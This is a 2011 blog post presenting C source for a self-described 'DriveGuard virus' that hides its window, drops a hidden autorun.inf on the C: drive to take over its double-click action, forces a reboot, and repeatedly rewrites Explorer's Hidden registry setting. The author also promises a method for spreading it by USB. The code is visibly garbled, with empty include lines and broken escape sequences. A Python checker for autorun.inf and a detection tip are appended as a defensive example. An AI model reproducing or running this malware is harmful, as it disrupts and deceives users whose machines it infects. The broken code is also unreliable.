Monday, June 27, 2011

Simple Driveguard Virus in "C"

While it is present you cannot open the drive with a double click. I have written it to guard only the "C" drive; modify it to guard any drive. It hides itself (its window will not be visible) and restarts the system when it is executed. After the system boots you will not be able to double-click and open the drive.
Solution:
Find and delete the autorun.inf file (it will be hidden) in the "C" drive and restart the system. In the next post I will tell how to run the virus when someone double-clicks the USB, infecting their system :-)
/*Simple DriveGuard virus in "C"
Coded by sham*/
/*Solution:To remove de virus just delete the "autorun.inf" file
it will be in hidden mode*/
#include
#include
#include

int main()
{
    FILE *fp;
    HWND hwnd = GetForegroundWindow();
    HKEY hKey;
    DWORD val =2;
    ShowWindow(hwnd,SW_HIDE);//Hide its own console window
    fp=fopen("c:\autorun.inf","w");
    fprintf(fp,"[autorun]n");
    fprintf( fp,"open notepad.exe");
    fprintf( fp,"n");
    fprintf(fp,"shell\virus=I am a virus!");
    fprintf( fp,"n");
    fprintf(fp,"shell\virus\command=notepad.exe");
    fprintf( fp,"n");
    fprintf(fp,"shell=virus");
    fclose(fp);
    system("attrib +H c:\autorun.inf");//To be be in hidden mode
  system("shutdown -r -t 10");// restart the system after 10 seconds

while(1)
{
        sleep(50);
RegOpenKeyEx(HKEY_CURRENT_USER,"Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", 0,KEY_ALL_ACCESS,&hKey);
RegSetValueEx(hKey,"Hidden",0,REG_DWORD,(DWORD)&val, sizeof(val));
}
 getch();
return 0;
}
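
A defender-side check for the file this program drops, added here as an example and not part of the original post: it parses autorun.inf text and reports the keys that launch a program or take over the drive's double-click action. The function name `triage_autorun` and the sample contents are constructed for illustration.

```python
"""Triage an autorun.inf: report keys that launch a program or replace the
drive's default double-click action. Added example; names are hypothetical."""
import re

# Constructed sample using the same keys the program above writes to the C: drive
SAMPLE = (
    "[autorun]\n"
    "open=notepad.exe\n"
    "shell\\virus=I am a virus!\n"
    "shell\\virus\\command=notepad.exe\n"
    "shell=virus\n"
)

LAUNCH_KEYS = {"open", "shellexecute"}
VERB_CMD = re.compile(r"^shell\\([^\\]+)\\command$", re.IGNORECASE)


def triage_autorun(text):
    """Return (key, value, reason) findings for the [autorun] section."""
    findings, verbs, default_verb, section = [], {}, None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue  # blank line or comment
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section != "autorun" or "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        lkey = key.lower()
        m = VERB_CMD.match(key)
        if lkey in LAUNCH_KEYS:
            findings.append((key, value, "runs a program on AutoPlay"))
        elif m:
            verbs[m.group(1).lower()] = (key, value)
        elif lkey == "shell":
            default_verb = value.lower()  # verb used on double click
    for verb, (key, value) in verbs.items():
        reason = "adds a context-menu command"
        if verb == default_verb:
            reason = "replaces the drive's double-click action"
        findings.append((key, value, reason))
    return findings


if __name__ == "__main__":
    for key, value, reason in triage_autorun(SAMPLE):
        print(f"{key} = {value}  <- {reason}")
```

The dropped file carries the hidden attribute and the program keeps setting Explorer's Hidden value to 2, so look for it from a command prompt with `dir /a:h` rather than in Explorer.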
